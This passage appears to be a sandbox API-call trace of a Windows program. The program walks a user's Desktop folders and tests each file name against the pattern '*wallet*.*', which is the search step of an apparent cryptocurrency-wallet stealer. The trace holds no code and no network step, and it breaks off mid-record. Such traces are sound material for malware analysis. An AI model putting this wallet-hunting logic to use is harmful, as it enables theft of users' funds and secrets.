lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.796] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="3CEoMqDCJmINqN85E.bmp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\3CEoMqDCJmINqN85E.bmp") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\3CEoMqDCJmINqN85E.bmp" [0110.796] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.796] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.796] lstrcatW (in: lpString1="\\KTOu\\", lpString2="3CEoMqDCJmINqN85E.bmp" | out: lpString1="\\KTOu\\3CEoMqDCJmINqN85E.bmp") returned="\\KTOu\\3CEoMqDCJmINqN85E.bmp" [0110.796] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\3CEoMqDCJmINqN85E.bmp", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0110.796] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3a) returned 0x29a2e40 [0110.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\3CEoMqDCJmINqN85E.bmp", cchWideChar=58, lpMultiByteStr=0x29a2e40, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\3CEoMqDCJmINqN85E.bmp", lpUsedDefaultChar=0x0) returned 58 [0110.796] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2b28 [0110.796] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2e40 | out: hHeap=0x29a0000) returned 1 [0110.796] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.796] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970c00 [0110.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x3970c00, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.796] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39704e8 [0110.796] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c00 | out: hHeap=0x29a0000) returned 1 [0110.796] PathMatchSpecW (pszFile="3CEoMqDCJmINqN85E.bmp", pszSpec="*wallet*.*") returned 0 [0110.796] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39704e8 | out: hHeap=0x29a0000) returned 1 [0110.796] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2b28 | out: hHeap=0x29a0000) returned 1 [0110.796] FindNextFileW (in: hFindFile=0x7437a0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1872110, ftCreationTime.dwHighDateTime=0x1d7a92f, ftLastAccessTime.dwLowDateTime=0xbc62b500, ftLastAccessTime.dwHighDateTime=0x1d7ace6, ftLastWriteTime.dwLowDateTime=0xbc62b500, ftLastWriteTime.dwHighDateTime=0x1d7ace6, nFileSizeHigh=0x0, nFileSizeLow=0x3ae1, dwReserved0=0x0, dwReserved1=0x0, cFileName="eUCY-_yVF.swf", cAlternateFileName="EUCY-_~1.SWF")) returned 1 [0110.796] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.796] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.796] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="eUCY-_yVF.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\eUCY-_yVF.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\eUCY-_yVF.swf" [0110.796] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.796] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.796] lstrcatW (in: lpString1="\\KTOu\\", lpString2="eUCY-_yVF.swf" | out: lpString1="\\KTOu\\eUCY-_yVF.swf") returned="\\KTOu\\eUCY-_yVF.swf" [0110.796] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\eUCY-_yVF.swf", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0110.796] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x32) returned 0x38ea818 [0110.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\eUCY-_yVF.swf", cchWideChar=50, lpMultiByteStr=0x38ea818, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\eUCY-_yVF.swf", lpUsedDefaultChar=0x0) returned 50 [0110.797] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2a08 [0110.797] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea818 | out: hHeap=0x29a0000) returned 1 [0110.797] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.797] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970d80 [0110.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x3970d80, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.797] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970560 [0110.797] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d80 | out: hHeap=0x29a0000) returned 1 [0110.797] PathMatchSpecW (pszFile="eUCY-_yVF.swf", pszSpec="*wallet*.*") returned 0 [0110.797] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970560 | out: hHeap=0x29a0000) returned 1 [0110.797] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2a08 | out: hHeap=0x29a0000) returned 1 [0110.797] FindNextFileW (in: hFindFile=0x7437a0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58f2e50, ftCreationTime.dwHighDateTime=0x1d7b054, ftLastAccessTime.dwLowDateTime=0xe568fc80, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0xe568fc80, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0xb99e, dwReserved0=0x0, dwReserved1=0x0, cFileName="HLPCM ND3Cl3FgAs3.mp4", cAlternateFileName="HLPCMN~1.MP4")) returned 1 [0110.797] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.797] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.797] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="HLPCM ND3Cl3FgAs3.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\HLPCM ND3Cl3FgAs3.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\HLPCM ND3Cl3FgAs3.mp4" [0110.797] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.797] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.797] lstrcatW (in: lpString1="\\KTOu\\", lpString2="HLPCM ND3Cl3FgAs3.mp4" | out: lpString1="\\KTOu\\HLPCM ND3Cl3FgAs3.mp4") returned="\\KTOu\\HLPCM ND3Cl3FgAs3.mp4" [0110.797] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\HLPCM ND3Cl3FgAs3.mp4", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0110.797] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3a) returned 0x29a2978 [0110.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\HLPCM ND3Cl3FgAs3.mp4", cchWideChar=58, lpMultiByteStr=0x29a2978, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\HLPCM ND3Cl3FgAs3.mp4", lpUsedDefaultChar=0x0) returned 58 [0110.797] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2a98 [0110.797] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2978 | out: hHeap=0x29a0000) returned 1 [0110.797] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.797] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970ea0 [0110.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x3970ea0, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.798] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970358 [0110.798] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ea0 | out: hHeap=0x29a0000) returned 1 [0110.798] PathMatchSpecW (pszFile="HLPCM ND3Cl3FgAs3.mp4", pszSpec="*wallet*.*") returned 0 [0110.798] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970358 | out: hHeap=0x29a0000) returned 1 [0110.798] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2a98 | out: hHeap=0x29a0000) returned 1 [0110.798] FindNextFileW (in: hFindFile=0x7437a0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b9803e0, ftCreationTime.dwHighDateTime=0x1d7a67d, ftLastAccessTime.dwLowDateTime=0xc285fda0, ftLastAccessTime.dwHighDateTime=0x1d7ada1, ftLastWriteTime.dwLowDateTime=0xc285fda0, ftLastWriteTime.dwHighDateTime=0x1d7ada1, nFileSizeHigh=0x0, nFileSizeLow=0x910b, dwReserved0=0x0, dwReserved1=0x0, cFileName="LQQ8KQ8OZpD-.wav", cAlternateFileName="LQQ8KQ~1.WAV")) returned 1 [0110.798] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.798] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.798] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="LQQ8KQ8OZpD-.wav" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\LQQ8KQ8OZpD-.wav") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\LQQ8KQ8OZpD-.wav" [0110.798] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.798] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.798] lstrcatW (in: lpString1="\\KTOu\\", lpString2="LQQ8KQ8OZpD-.wav" | out: lpString1="\\KTOu\\LQQ8KQ8OZpD-.wav") returned="\\KTOu\\LQQ8KQ8OZpD-.wav" [0110.798] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\LQQ8KQ8OZpD-.wav", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0110.798] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x35) returned 0x38ea8d8 [0110.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\LQQ8KQ8OZpD-.wav", cchWideChar=53, lpMultiByteStr=0x38ea8d8, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\LQQ8KQ8OZpD-.wav", lpUsedDefaultChar=0x0) returned 53 [0110.798] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2780 [0110.798] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea8d8 | out: hHeap=0x29a0000) returned 1 [0110.798] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0110.798] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x16) returned 0x3970cc0 [0110.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=11, lpWideCharStr=0x3970cc0, cchWideChar=11 | out: lpWideCharStr="*wallet*.*") returned 11 [0110.798] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39704c0 [0110.798] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970cc0 | out: hHeap=0x29a0000) returned 1 [0110.798] PathMatchSpecW (pszFile="LQQ8KQ8OZpD-.wav", pszSpec="*wallet*.*") returned 0 [0110.798] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39704c0 | out: hHeap=0x29a0000) returned 1 [0110.799] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2780 | out: hHeap=0x29a0000) returned 1 [0110.799] FindNextFileW (in: hFindFile=0x7437a0, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a5349d0, ftCreationTime.dwHighDateTime=0x1d7a0e8, ftLastAccessTime.dwLowDateTime=0x3bacdd80, ftLastAccessTime.dwHighDateTime=0x1d7a8c4, ftLastWriteTime.dwLowDateTime=0x3bacdd80, ftLastWriteTime.dwHighDateTime=0x1d7a8c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UQEQQujqhNYM", cAlternateFileName="UQEQQU~1")) returned 1 [0110.799] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.799] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.799] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.799] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.799] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.799] lstrcatW (in: lpString1="\\KTOu\\", lpString2="UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.799] lstrcmpW (lpString1="UQEQQujqhNYM", lpString2=".") returned 1 [0110.799] lstrcmpW (lpString1="UQEQQujqhNYM", lpString2="..") returned 1 [0110.799] lstrcpyW (in: lpString1=0x19bf40, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.799] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\*.*" [0110.799] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\*.*", lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a5349d0, ftCreationTime.dwHighDateTime=0x1d7a0e8, ftLastAccessTime.dwLowDateTime=0x3bacdd80, ftLastAccessTime.dwHighDateTime=0x1d7a8c4, ftLastWriteTime.dwLowDateTime=0x3bacdd80, ftLastWriteTime.dwHighDateTime=0x1d7a8c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7435a0 [0110.799] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.799] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\" [0110.799] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\", lpString2="." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\.") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\." [0110.799] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.799] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\") returned="\\KTOu\\UQEQQujqhNYM\\" [0110.799] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM\\", lpString2="." | out: lpString1="\\KTOu\\UQEQQujqhNYM\\.") returned="\\KTOu\\UQEQQujqhNYM\\." [0110.799] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0110.799] FindNextFileW (in: hFindFile=0x7435a0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a5349d0, ftCreationTime.dwHighDateTime=0x1d7a0e8, ftLastAccessTime.dwLowDateTime=0x3bacdd80, ftLastAccessTime.dwHighDateTime=0x1d7a8c4, ftLastWriteTime.dwLowDateTime=0x3bacdd80, ftLastWriteTime.dwHighDateTime=0x1d7a8c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.799] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.800] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\" [0110.800] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\", lpString2=".." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\..") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\.." [0110.800] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.800] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\") returned="\\KTOu\\UQEQQujqhNYM\\" [0110.800] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM\\", lpString2=".." | out: lpString1="\\KTOu\\UQEQQujqhNYM\\..") returned="\\KTOu\\UQEQQujqhNYM\\.." [0110.800] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0110.800] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0110.800] FindNextFileW (in: hFindFile=0x7435a0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd13220d0, ftCreationTime.dwHighDateTime=0x1d79ffb, ftLastAccessTime.dwLowDateTime=0xb8ee8eb0, ftLastAccessTime.dwHighDateTime=0x1d7a126, ftLastWriteTime.dwLowDateTime=0xb8ee8eb0, ftLastWriteTime.dwHighDateTime=0x1d7a126, nFileSizeHigh=0x0, nFileSizeLow=0x16d3e, dwReserved0=0x0, dwReserved1=0x0, cFileName="LlE7.doc", cAlternateFileName="")) returned 1 [0110.800] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.800] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\" [0110.800] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\", lpString2="LlE7.doc" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\LlE7.doc") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\LlE7.doc" [0110.800] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\UQEQQujqhNYM" | out: lpString1="\\KTOu\\UQEQQujqhNYM") returned="\\KTOu\\UQEQQujqhNYM" [0110.800] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM", lpString2="\\" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\") returned="\\KTOu\\UQEQQujqhNYM\\" [0110.800] lstrcatW (in: lpString1="\\KTOu\\UQEQQujqhNYM\\", lpString2="LlE7.doc" | out: lpString1="\\KTOu\\UQEQQujqhNYM\\LlE7.doc") returned="\\KTOu\\UQEQQujqhNYM\\LlE7.doc" [0110.800] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\LlE7.doc", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0110.800] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3a) returned 0x29a2cd8 [0110.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\LlE7.doc", cchWideChar=58, 